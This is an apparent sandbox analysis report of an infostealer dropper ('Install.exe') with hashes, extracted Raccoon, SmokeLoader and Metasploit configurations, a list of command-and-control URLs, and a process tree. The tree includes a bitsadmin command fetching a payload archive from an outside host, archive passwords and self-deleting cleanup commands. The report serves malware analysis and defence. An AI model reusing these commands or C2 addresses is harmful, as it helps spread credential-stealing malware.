Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    57s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 06:39

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 18 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1236
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2632
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2624
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2376
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2336
          • C:\Users\Admin\AppData\Local\Temp\Install.exe
            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:4044
            • C:\Users\Admin\AppData\Local\Temp\is-P4863.tmp\Install.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-P4863.tmp\Install.tmp" /SL5="$5002E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1084
              • C:\Users\Admin\AppData\Local\Temp\is-INQ4M.tmp\Ultra.exe
                "C:\Users\Admin\AppData\Local\Temp\is-INQ4M.tmp\Ultra.exe" /S /UID=burnerch1
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Program Files directory
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2572
                • C:\Program Files\Windows Media Player\KXLZNBLMEZ\ultramediaburner.exe
                  "C:\Program Files\Windows Media Player\KXLZNBLMEZ\ultramediaburner.exe" /VERYSILENT
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3104
                  • C:\Users\Admin\AppData\Local\Temp\is-GCVD0.tmp\ultramediaburner.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-GCVD0.tmp\ultramediaburner.tmp" /SL5="$6005E,281924,62464,C:\Program Files\Windows Media Player\KXLZNBLMEZ\ultramediaburner.exe" /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:3940
                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                      6⤵
                      • Executes dropped EXE
                      PID:1808
                • C:\Users\Admin\AppData\Local\Temp\55-f63d6-83a-acd8f-92a2e881cf50e\Gaebaevaezhyhu.exe
                  "C:\Users\Admin\AppData\Local\Temp\55-f63d6-83a-acd8f-92a2e881cf50e\Gaebaevaezhyhu.exe"
                  4⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3888
                • C:\Users\Admin\AppData\Local\Temp\c2-4bab5-d40-e1f8a-d5be7b0d0a3fc\SHaesizhaexaeqa.exe
                  "C:\Users\Admin\AppData\Local\Temp\c2-4bab5-d40-e1f8a-d5be7b0d0a3fc\SHaesizhaexaeqa.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2364
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p2lmxthd.utn\instEU.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4268
                    • C:\Users\Admin\AppData\Local\Temp\p2lmxthd.utn\instEU.exe
                      C:\Users\Admin\AppData\Local\Temp\p2lmxthd.utn\instEU.exe
                      6⤵
                      • Executes dropped EXE
                      PID:4508
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1pu1se0b.jde\md1_1eaf.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4640
                    • C:\Users\Admin\AppData\Local\Temp\1pu1se0b.jde\md1_1eaf.exe
                      C:\Users\Admin\AppData\Local\Temp\1pu1se0b.jde\md1_1eaf.exe
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4840
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rapruvk2.5ob\google-game.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4604
                    • C:\Users\Admin\AppData\Local\Temp\rapruvk2.5ob\google-game.exe
                      C:\Users\Admin\AppData\Local\Temp\rapruvk2.5ob\google-game.exe
                      6⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:5096
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        7⤵
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4628
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1lamw0r.mh3\y1.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:6136
                    • C:\Users\Admin\AppData\Local\Temp\l1lamw0r.mh3\y1.exe
                      C:\Users\Admin\AppData\Local\Temp\l1lamw0r.mh3\y1.exe
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:4368
                      • C:\Users\Admin\AppData\Local\Temp\uI871BhYbH.exe
                        "C:\Users\Admin\AppData\Local\Temp\uI871BhYbH.exe"
                        7⤵
                          PID:4296
                          • C:\Users\Admin\AppData\Roaming\1619246259974.exe
                            "C:\Users\Admin\AppData\Roaming\1619246259974.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619246259974.txt"
                            8⤵
                              PID:6044
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\uI871BhYbH.exe"
                              8⤵
                                PID:4112
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:5476
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 127.0.0.1 -n 3
                                  9⤵
                                  • Runs ping.exe
                                  PID:4380
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\l1lamw0r.mh3\y1.exe"
                              7⤵
                                PID:2328
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:5508
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1sbaviyw.hpy\inst.exe & exit
                            5⤵
                              PID:5712
                              • C:\Users\Admin\AppData\Local\Temp\1sbaviyw.hpy\inst.exe
                                C:\Users\Admin\AppData\Local\Temp\1sbaviyw.hpy\inst.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4488
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zibdnfc1.oow\SunLabsPlayer.exe /S & exit
                              5⤵
                                PID:5144
                                • C:\Users\Admin\AppData\Local\Temp\zibdnfc1.oow\SunLabsPlayer.exe
                                  C:\Users\Admin\AppData\Local\Temp\zibdnfc1.oow\SunLabsPlayer.exe /S
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Drops file in Program Files directory
                                  PID:5920
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                    7⤵
                                      PID:4748
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                      7⤵
                                        PID:5440
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          8⤵
                                            PID:4952
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                          7⤵
                                            PID:5808
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4336
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5820
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4960
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:652
                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                  7⤵
                                                  • Download via BitsAdmin
                                                  PID:4580
                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Sn1wY9H1gi4Vlf -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                  7⤵
                                                    PID:1652
                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3EDfsj3RM1m33yP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                    7⤵
                                                      PID:5656
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5420
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:3872
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4168
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4564
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4156
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                7⤵
                                                                  PID:4392
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                    8⤵
                                                                      PID:2232
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4508
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5652
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4172
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:184
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7799.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5768
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                                PID:4700
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ok0ug5yk.ekv\GcleanerWW.exe /mixone & exit
                                                                            5⤵
                                                                              PID:5588
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dktxrwtu.sp3\toolspab1.exe & exit
                                                                              5⤵
                                                                                PID:4952
                                                                                • C:\Users\Admin\AppData\Local\Temp\dktxrwtu.sp3\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\dktxrwtu.sp3\toolspab1.exe
                                                                                  6⤵
                                                                                    PID:5444
                                                                                    • C:\Users\Admin\AppData\Local\Temp\dktxrwtu.sp3\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\dktxrwtu.sp3\toolspab1.exe
                                                                                      7⤵
                                                                                        PID:5476
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ookzxca1.on1\c7ae36fa.exe & exit
                                                                                    5⤵
                                                                                      PID:4336
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ookzxca1.on1\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\ookzxca1.on1\c7ae36fa.exe
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4940
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sb3vcx5y.54k\app.exe /8-2222 & exit
                                                                                      5⤵
                                                                                        PID:4696
                                                                                        • C:\Users\Admin\AppData\Local\Temp\sb3vcx5y.54k\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\sb3vcx5y.54k\app.exe /8-2222
                                                                                          6⤵
                                                                                            PID:5820
                                                                                            • C:\Users\Admin\AppData\Local\Temp\sb3vcx5y.54k\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\sb3vcx5y.54k\app.exe" /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:6008
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1824
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                    1⤵
                                                                                      PID:1368
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                      1⤵
                                                                                        PID:1260
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                        1⤵
                                                                                          PID:1064
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                          1⤵
                                                                                            PID:964
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                            1⤵
                                                                                              PID:1008
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2292
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:5236
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                              1⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:3480
                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              PID:2144
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4716
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4908
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:4880
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                              1⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              PID:4408
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:4588
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:4972
                                                                                            • C:\Users\Admin\AppData\Local\Temp\440F.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\440F.exe
                                                                                              1⤵
                                                                                                PID:188
                                                                                              • C:\Users\Admin\AppData\Local\Temp\4652.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\4652.exe
                                                                                                1⤵
                                                                                                  PID:5848
                                                                                                • C:\Users\Admin\AppData\Local\Temp\5268.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\5268.exe
                                                                                                  1⤵
                                                                                                    PID:3900
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                      2⤵
                                                                                                        PID:4976
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout 1
                                                                                                          3⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2344
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5268.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5268.exe"
                                                                                                        2⤵
                                                                                                          PID:5712
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 2320
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:5152
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5A49.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\5A49.exe
                                                                                                        1⤵
                                                                                                          PID:2680
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5A49.exe"
                                                                                                            2⤵
                                                                                                              PID:5440
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                3⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:4584
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6641.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\6641.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5444
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6864.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\6864.exe
                                                                                                            1⤵
                                                                                                              PID:5060
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6F0D.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\6F0D.exe
                                                                                                              1⤵
                                                                                                                PID:4736
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                  2⤵
                                                                                                                    PID:5020
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\770C.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\770C.exe
                                                                                                                  1⤵
                                                                                                                    PID:4652
